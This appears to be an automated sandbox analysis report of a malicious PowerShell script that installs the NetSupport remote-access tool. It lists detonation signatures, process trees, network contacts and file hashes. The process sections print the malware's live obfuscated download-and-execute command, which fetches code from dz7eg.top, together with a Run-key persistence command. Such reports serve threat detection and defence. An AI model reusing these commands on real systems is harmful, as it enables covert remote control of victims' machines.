Analysis Overview
SHA256
8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Threat Level: Known bad
The file rt.php.ps1 was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Deletes itself
Adds Run key to start application
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-30 17:14
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-30 17:14
Reported
2023-05-30 17:45
Platform
win7-20230220-en
Max time kernel
1600s
Max time network
1602s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
Network
Files
memory/1676-58-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
memory/1676-59-0x0000000002320000-0x0000000002328000-memory.dmp
memory/1676-60-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/1676-61-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/1676-62-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/1676-63-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/1676-64-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/1676-65-0x00000000024E0000-0x0000000002560000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-05-30 17:14
Reported
2023-05-30 17:45
Platform
win10v2004-20230220-en
Max time kernel
1552s
Max time network
1756s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\34dW5imkHZMP\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1908 wrote to memory of 3384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1908 wrote to memory of 3384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3384 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 3384 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 1908 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1908 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe""
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dz7eg.top | udp |
| US | 143.244.162.145:80 | dz7eg.top | tcp |
| US | 8.8.8.8:53 | 145.162.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fduic.top | udp |
| DE | 167.235.159.22:443 | fduic.top | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 51.142.119.24:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 22.159.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.119.142.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 40.125.122.151:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 20.42.65.85:443 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.141.123.20.in-addr.arpa | udp |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | 112.208.253.8.in-addr.arpa | udp |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.94.239.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.238.32.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puvg0ve5.tfy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1908-141-0x000001B75E2D0000-0x000001B75E2F2000-memory.dmp
memory/1908-143-0x000001B745C00000-0x000001B745C10000-memory.dmp
memory/1908-144-0x000001B745C00000-0x000001B745C10000-memory.dmp
memory/1908-145-0x000001B745C00000-0x000001B745C10000-memory.dmp
memory/3384-155-0x000001379F770000-0x000001379F780000-memory.dmp
memory/3384-156-0x000001379F770000-0x000001379F780000-memory.dmp
memory/1908-160-0x000001B75EF10000-0x000001B75EF1A000-memory.dmp
memory/1908-161-0x000001B75F2A0000-0x000001B75F2B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d6ca57a0b3d565156f3c053e1c0743b6 |
| SHA1 | bf9251134a1e54956fd943969588382917d7b2f6 |
| SHA256 | 35f9a5113cfed3fe3df6f0d5ef92c573e70d4aadc61b556973974d3f90d0b855 |
| SHA512 | aa891c80594b815e065601891656cef0996a1f8507dadec3381b33cb479a5921877b94da08b88dba6b7b2b6e9628458b592969cd2e4d36ad295264244fe5790d |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\NSM.LIC
| MD5 | 390c964070626a64888d385c514f568e |
| SHA1 | a556209655dcb5e939fd404f57d199f2bb6da9b3 |
| SHA256 | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 |
| SHA512 | f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\client32.ini
| MD5 | 5d2b788f10e973fce372fa2e4ececd4e |
| SHA1 | 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1 |
| SHA256 | 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475 |
| SHA512 | 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-30 17:14
Reported
2023-05-30 17:45
Platform
win10-20230220-en
Max time kernel
403s
Max time network
1758s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\f9Av6lBR2ENs\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1608 wrote to memory of 4760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1608 wrote to memory of 4760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4760 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 4760 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 1608 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1608 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe""
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dz7eg.top | udp |
| US | 143.244.162.145:80 | dz7eg.top | tcp |
| US | 8.8.8.8:53 | 145.162.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fduic.top | udp |
| DE | 167.235.159.22:443 | fduic.top | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 22.159.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp |
| JP | 40.79.189.59:443 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.211.247.8.in-addr.arpa | udp |
Files
memory/1608-124-0x00000251AA7C0000-0x00000251AA7E2000-memory.dmp
memory/1608-127-0x00000251AA970000-0x00000251AA9E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfemd1is.4ti.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1608-136-0x00000251908B0000-0x00000251908C0000-memory.dmp
memory/1608-137-0x00000251908B0000-0x00000251908C0000-memory.dmp
memory/1608-187-0x00000251908B0000-0x00000251908C0000-memory.dmp
memory/4760-189-0x000001FA76650000-0x000001FA76660000-memory.dmp
memory/4760-188-0x000001FA76650000-0x000001FA76660000-memory.dmp
memory/1608-190-0x00000251908B0000-0x00000251908C0000-memory.dmp
memory/4760-191-0x000001FA76650000-0x000001FA76660000-memory.dmp
memory/4760-200-0x000001FA76650000-0x000001FA76660000-memory.dmp
memory/1608-223-0x00000251AAF50000-0x00000251AAF5A000-memory.dmp
memory/1608-224-0x00000251AAF80000-0x00000251AAF92000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56efdb5a0f10b5eece165de4f8c9d799 |
| SHA1 | fa5de7ca343b018c3bfeab692545eb544c244e16 |
| SHA256 | 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108 |
| SHA512 | 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | df1a4ff784a50670244eb782884af91f |
| SHA1 | 0dbcddbafcc416b4b35820d9ae83ee70f63f2d2a |
| SHA256 | 93445522a6ba5648bd6618ca3ef2a70ee0a767fe87dcb7450aa939860e90f1ae |
| SHA512 | eb252587929d2538adc642b0d18c6c94a23a5949262ea11256b2d1b7c108c7f4f95bf66a7d9bfece81bff522c972191867ed44739d76ef5df43d032b53899593 |
memory/3684-270-0x000001866E890000-0x000001866E8A0000-memory.dmp
memory/3684-271-0x000001866E890000-0x000001866E8A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
